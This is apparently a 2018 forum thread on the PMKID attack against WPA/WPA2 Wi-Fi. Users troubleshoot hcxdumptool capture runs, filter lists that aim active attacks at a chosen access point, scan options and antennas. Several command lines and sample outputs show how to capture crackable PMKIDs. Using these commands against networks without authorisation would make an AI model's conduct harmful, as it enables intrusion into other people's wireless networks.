New attack on WPA/WPA2 using PMKID
added rcascan (radio assignement scan):
$ hcxdumptool -h
--do_rcascan: show radio channel assignment (scan for target access points)

xxxxxxxxxxxx <ESSID 1> [CHANNEL 1]
xxxxxxxxxxxx <ESSID 2> [CHANNEL 7]
xxxxxxxxxxxx <ESSID 3> [CHANNEL 11, AP IN RANGE]

AP IN RANGE means that the access point responded to our request!
If no accesspoint respond, go closer to the access point or improve your equipment!
Is there any use for this (not exactly for pmkid, but for usual wpa2 crack)?

Hi stinky.
No, that is business as usual: WPA-EAPOL-PBKDF2. If we got only M4 of the handshake, we simply ask for the other key messages to retrieve an authorized handshake. That's all - just another attack vector.
But this attack vector will work, even if PMF is enabled.
(08-19-2018, 02:43 AM)slyexe Wrote:
Quote:Thanks for the info. Not sure it answered my question?
Can someone tell me why am only getting Found handshake AP-LESS ,EAPOL TIMEOUT
I have not seen PMKID Found only handshake found

Thanks Kev

Its because you're not in range of any Routers which broadcast the PMK  just as zerobeat has told you. 
This attack does not enable clientless attacks on ALL MAKES OF ROUTERS. It's only available if the router is setup to provide you with the proper information for the PMK. The data you have is telling you that you have obtained an AP-Less Handshake, meaning you are only able to receive a signal strong enough to the client and not the router.
Thanks for the answers. Back to the drawn board and better antenna. Cheer Kev
Usually we use panel antennas like this ones:
or parabolic antennas like that one:
Another driver, tested with hcxdumptool (again Realtek):

[35053.423872] usb 5-4.5: Product: Edimax AC600 USB
[35053.423874] usb 5-4.5: Manufacturer: Realtek

[18:48:32 - 001] xxxxxxxxxxxx -> f0a2259b9825 [FOUND PMKID CLIENT-LESS]
Hello, first of all, thanks for a great share for a new way to get handshakes and PMKIDS.

I don't have any problems of running hcxdumptool, hcxpcaptool or hashcat but I ran into problem which I can't solve with hcxdumptool

I wrote this line hcxdumptool -o test.pcapng -i wlan0 --enable_status --filtermode=2 --filterlist=filter.txt

In filter.txt there is one line with MAC ADRESS OF AP POINT which I want to attack.
But when i Dump my result with hcxpcaptool, I have others AP POINTS which was in that range PMKIDS, but not one that i wrote in filter.txt.

Can anybody help me to solve this,how to scan exactly just one AP POINT i want to attack. Thanks
You're running an old version. Please pull latest git commit.
Filter lists are only used in the transmission branch. Using a filter list means, that we run active attacks against the entries (filtermode=2) or do not run active attacks against them (filtermode=1). But nevertheless hcxdumptool is still a passive dumper and will capture all informations it received.

The last version has some more options:
--do_rcascan: show radio channel assignment (scan for target access points)
you should disable auto scrolling in your terminal settings
--save_rcascan=<file>: output rca scan list to file when hcxdumptool terminated
--save_rcascan_raw=<file>: output file in pcapngformat
unfiltered packets
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)

Rca scan will show you ‎whether access points are in range or not. We do not measure the signal strength, because this values are not meaningful. Instead we send a request and look for a response.
Well, there is no longer need to run airodump-ng to retrieve  a target list (as shown in some youtube video turorials).
If I want to use this new method, it seems to me that I need to know the length of the password and the type of characters in the password and where they are located. Is that correct ?
(08-22-2018, 02:00 PM)SP2005 Wrote: Is that correct ?

No. Please review hashcat's attack modes and their usages.